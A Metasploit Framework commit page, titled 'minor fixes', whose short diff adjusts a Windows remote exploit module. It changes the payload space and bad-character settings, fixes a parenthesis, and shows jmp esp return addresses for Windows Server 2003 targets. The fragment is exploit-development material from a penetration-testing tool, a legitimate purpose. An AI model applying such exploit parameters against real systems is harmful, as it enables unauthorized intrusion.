minor fixes

git-svn-id: file:///home/svn/framework3/trunk@12925 4d416f70-5f16-0410-b530-b9f4589650da
unstable
David Rude 2011-06-12 00:04:55 +00:00
parent db413592e9
commit 04d280fdd0
1 changed files with 3 additions and 3 deletions

View File

@ -51,8 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => true, 'Privileged' => true,
'Payload' => 'Payload' =>
{ {
'Space' => 1000, 'Space' => 400,
'BadChars' => "\x00\x0d\x0a\x25", 'BadChars' => "\x00\x0d\x0a",
'StackAdjustment' => -3500, 'StackAdjustment' => -3500,
}, },
'Platform' => 'win', 'Platform' => 'win',
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
['Windows Server 2003 SP1', { 'Ret' => 0x77403680 }], # user32.dll - jmp esp ['Windows Server 2003 SP1', { 'Ret' => 0x77403680 }], # user32.dll - jmp esp
['Windows Server 2003 SP2', { 'Ret' => 0x77402680 }], # user32.dll - jmp esp ['Windows Server 2003 SP2', { 'Ret' => 0x77402680 }], # user32.dll - jmp esp
], ],
'DisclosureDate' => 'May 31 2011') 'DisclosureDate' => 'May 31 2011'))
register_options( register_options(
[ [